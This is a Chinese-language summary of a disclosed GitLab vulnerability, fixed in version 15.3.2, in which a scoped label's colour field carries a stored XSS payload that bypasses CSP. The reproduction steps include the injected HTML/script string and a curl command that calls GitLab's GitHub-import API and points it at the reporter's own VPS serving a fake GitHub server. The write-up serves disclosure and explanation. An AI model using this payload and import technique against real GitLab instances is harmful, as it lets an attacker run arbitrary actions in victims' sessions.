背景介绍:
H1最近披露了一处GitLab的漏洞,白帽通过作用域标签绕过CSP,从而实现存储型XSS攻击,该漏洞已经在 Gitlab 15.3.2 版本修复。
漏洞详情:
要复现该漏洞,需要以下前提条件:
- Scoped 标签在 Gitlab Premium 中可用,因此需要通过免费试用来获得一个高级帐户
- 一个 Gitlab 个人访问令牌(可通过
https://gitlab.com/-/profile/personal_access_tokens?name=test&scopes=api
申请获得)
Github 不允许创建任意颜色的标签,可以在附件中找到一个虚拟 Github 服务器,然后在其中设置了一个新标签:
- name:
yvvdwf::label-name(the::to scope the label) - color:
>yvvdwf-label<form class='hidden gl-show-field-errors'><input title='<script>alert(document.domain)</script>'><br></br>
为了便于复现和验证漏洞,白帽在自己的VPS http://51.75.74.52:11211 上托管了虚拟Github服务器。
打开一个terminal,然后运行以下命令,其中:
- $GL_TOKEN 是上面创建的 api token
- yvvdwf-group-a 是一个具有高级功能的组(或帐户)名称
代码示例:
curl -kv "https://gitlab.com/api/v4/import/github" \
--request POST \
--header "content-type: application/json" \
--header "PRIVATE-TOKEN: $GL_TOKEN" \
--data '{
"personal_access_token": "ghp_aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa",
"repo_id": "523303538",
"target_namespace": "yvvdwf-group-a",
"new_name": "xss-on-label-color",
"github_hostname": "http://51.75.74.52:11211"
}'完成后,可以查看导入项目的标签列表,应该会看到由该脚本创建的弹出窗口
Document.domain
因为可以控制标签的颜色,所以可以使用 CSP-Bypass 在另一个位置创建存储XSS,而不是使用特定于 GitLab 列出标签的页面上创建存储的XSS,例如:
- https://gitlab.com/yvvdwf-group-a/xss-on-label-color/-/labels
- https://gitlab.com/yvvdwf-group-a/xss-on-label-color/-/issues/
漏洞影响:
带有 CSP-bypass 的 存储型 XSS 允许攻击者对受害者执行任意操作。
希望本文能对你有所收获,欢迎转发分享~
